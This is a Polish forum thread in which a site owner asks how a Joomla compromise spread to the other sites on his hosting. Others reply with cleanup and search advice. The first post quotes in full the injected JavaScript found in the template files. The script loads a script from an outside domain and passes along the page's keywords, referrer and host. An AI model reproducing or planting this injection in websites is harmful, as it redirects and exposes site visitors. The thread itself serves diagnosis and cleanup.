Włam do Jomla, dopisek redirect do plików header.php i index.php

[waluszek]

Witajcie,

Mam pewien problem, jakiś czas temu miałem włam do jednej z stron opartej na jomla, niestety nie pamiętam na jakiej wersjii.

Problem polega na tym że po za zaatakowaną stroną, zostały popodmieniane pliki innych stron. A dokładniej do plików templates/ index.php albo header.php
został dopisany taki oto kod.

Kod:

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://rtvjsuxxwe.uvadi.cz/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://rtvjsuxxwe.uvadi.cz/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

znalazłem ten kod, i jestem w trakcie usuwania, zastanawiam się tylko w jaki sposób udało mu się przeniknąć do pozostałych stron na hostingu?
Zastanawiam się jak wyizolować katalogi ze stronami tak aby nawet w przypadku infekcji bądź włamania, napastnik został wyizolowany wewnątrz katalogu strony i nie mógł przenieść się nigdzie dalej.

Czy można prosić o jakąś podpowiedź, lub może jest jakaś już gotowa instrukcja.
Będę niezmiernie wdzięczny.

[Gall Anonim]

1. Nie ma gotowej instrukcji - przypadki mogą się od siebie różnić o cały kosmos.
2. Ilość materiału na temat jest równie kosmiczna w wielu miejscach - między innymi na forum - szukaj i czytaj.
3. Sorki, ale pisanie po raz enty na dany temat jest po prostu męczące więc bez urazy za odesłanie do szukania treści już napisanych.
4. Czyszczenie pojedynczego kodu to tylko "zbijanie temperatury" przy leczeniu boreliozy w stadium kiedy się już ujawni - leczysz objaw a nie przyczynę.
tyle w temacie

[waluszek]

Ok, zdaję sobie sprawę, że przypadki są różne. Czyszczę kod, bo zaatakował wszystkie strony, a to oznacza że wylazł poza swój katalog. Do serwera bezpośrednio nie było włamania więc wlazł przez jakąś stronę.
Muszę poszukać w takim razie po kolei.

Przedewszytskim jak ograniczyć rozprzestrzenianie kodu, żeby nie mógł zainfekować pozostałych stron, bo w takim wypadku to szukanie kodu w kilkuset tysiącach plików.

Dzięki.

[Maks]

zaatakował wszystkie strony, a to oznacza że wylazł poza swój katalog. Do serwera bezpośrednio nie było włamania więc wlazł przez jakąś stronę.

A nie masz czasem na stronach komercyjnego dodatku z jakiegoś podejrzanego źródła ? Wszystkie wersje J! i dodatków aktualne ?

szukanie kodu w kilkuset tysiącach plików

Zobacz programem Replace Text http://www.ecobyte.com/replacetext/ Głowy nie dam, ale na 99% Notepad++ też potrafi szukać w wielu plikach jednocześnie. W ostateczności wyszukiwarka systemu Windows - > Opcje zaawansowane -> Szukaj w zawartości plików. Ale tutaj w wyniku dostaniesz tylko plik w którym jest fraza której szukasz. Musisz go później otworzyć jakimś edytorem i ręcznie wykasować wyszukiwany kod.

[Bazyl]

Zastanawiam się jak wyizolować katalogi ze stronami tak aby nawet w przypadku infekcji bądź włamania, napastnik został wyizolowany wewnątrz katalogu strony i nie mógł przenieść się nigdzie dalej.

Zapytaj u swojego hostingodawcy

[waluszek]

Może nie do końca zrozumiale to opisałem, złośliwy kod zawarty w pierwszym poście, to ja znalazłem bez problemu, mam dostęp ssh do swojego serwera, więc wykorzystałem polecenie grep.

Kod:

find . -name "*.php" -type f -print0 | xargs -0 grep -iHlnrE 'rtvjsuxxwe.uvadi.cz' 2> /dev/null

To wyszukało wszystkie pliki w których pojawia się adres strony.

Z wyszukiwaniem kodu, chodziło mi o to żeby znaleźć destrukcyjny kod, który umożliwił infekcję strony. A to bez znajomości składni lub przynajmniej jakiegoś klucza jest praktycznienie możliwe. przejrzenie kilkuset tysięcy linijek kodu, dodatkowo nie będąc programistą, jest praktycznie nie możliwe.

Całyczas zastanawiam się w jaki sposób to zostało wsadzone na serwer.

[Gall Anonim]

Oczekujesz gotowca, a gotowca jak już pisałem - nie ma.
Przyczyną równie dobrze może być jakikolwiek zawirusowany kom mający połączenie po ftp lub służący do logowania administracyjnego - więc spraw mi przyjemność i zacznij szukać, czytać - skoro chcesz wykonać to samodzielnie - co jest jak najbardziej możliwe - wykonaj samodzielnie a nie czyimiś rękoma, bez wysiłku. Przeczytaj jeszcze raz to co napisałem w poprzednim poście.

[mjmartino]

Destrukcyjnego kodu niema bo jest to kombinacja różnych skryptów widoczna gołym okiem bo jest dopisana, jednak wyszukanie nic nie daje zazwyczaj bo usuwasz tylko finalną część która i tak później powróci na swoje miejsce.
Trzeba przejrzeć od A do Z serwer, zostawienie najmniejszej części spowoduje że infekcja powróci niczym bumerang z tym że może być wówczas trudniejsza do wykrycia bo z dania na dzień skrypty ewaluują.
Kiedyś były zwykłe wstrzyknięcia js .. a teraz potrafią się nawet wewnętrznie całe zmodyfikowane WP instalować heh